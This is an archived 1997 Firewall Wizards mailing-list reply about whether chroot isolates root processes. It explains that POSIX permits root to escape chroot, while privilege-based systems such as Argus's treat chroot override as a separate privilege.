Firewall Wizards mailing list archives
Re: chroot useful?
From: mcnabb () argus-systems com (Paul McNabb)
Date: Fri, 14 Nov 1997 16:43:38 -0600
From: Bernhard Schneck <Bernhard_Schneck () genua de> In message <199711132205.RAA01373 () itd nrl navy mil> you write: > I was under the impression that running the chroot() command on a UNIX > box would make it impossible for all subsequently launched programs to > access files located above the newly defined root point, even if such > programs are launched with a UID of 0. [...] Probably most members of this list know already (or why would this be a ``wizzards'' list :-), but the usual unix/posix system call specifications *require* a way to break out of a chroot environment (at least for root). So either don't trust chroot, or don't be posix.
However, on Unix systems using privilege instead of root, a process with UID=0 is treated like any other process in terms of chroot(). With the Argus stuff, the privilege to override for chroot is separate from all others, so you can in fact use chroot for isolation. Of course with B-level security or capabilities (such as Decaf) you can remove files and directories from the domain of a process, but this is based on access control rather than namespace modification. paul --------------------------------------------------------- Paul McNabb Argus Systems Group, Inc. Vice President and CTO 1809 Woodfield Drive mcnabb () argus-systems com Savoy, IL 61874 USA TEL 217-355-6308 FAX 217-355-1433 "Securing the Future" ---------------------------------------------------------
Current thread:
- Re: chroot useful?, (continued)
- Re: chroot useful? Paul McNabb (Nov 12)
- Re: chroot useful? Steven M. Bellovin (Nov 13)
- Re: chroot useful? C Matthew Curtin (Nov 21)
- Re: chroot useful? Steven M. Bellovin (Nov 13)
- Re: chroot useful? Paul McNabb (Nov 12)
- Re: chroot useful? Douglas R. Steinbaum (Nov 13)
- Re: chroot useful? Darren Reed (Nov 14)
- Re: chroot useful? Steven M. Bellovin (Nov 14)
- Re: chroot useful? Aleph One (Nov 14)
- Re: chroot useful? Steven M. Bellovin (Nov 15)
- Re: chroot useful? Bernhard Schneck (Nov 14)
- Re: chroot useful? Paul McNabb (Nov 12)
- Re: chroot useful? Paul McNabb (Nov 14)
- Re: chroot useful? Paul McNabb (Nov 14)
- Re: chroot useful? Paul McNabb (Nov 14)
- Re: chroot useful? Anton J Aylward (Nov 15)
- Re: chroot useful? Steven M. Bellovin (Nov 16)
- Re: chroot useful? Anton J Aylward (Nov 15)
- Re: chroot useful? Darren Reed (Nov 16)
- Re: chroot useful? Anton J Aylward (Nov 16)
- Re: chroot useful? Anton J Aylward (Nov 16)
- Re: chroot useful? Darren Reed (Nov 16)
- Re: chroot useful? Rick Murphy (Nov 17)
- Re: chroot useful? Darren Reed (Nov 16)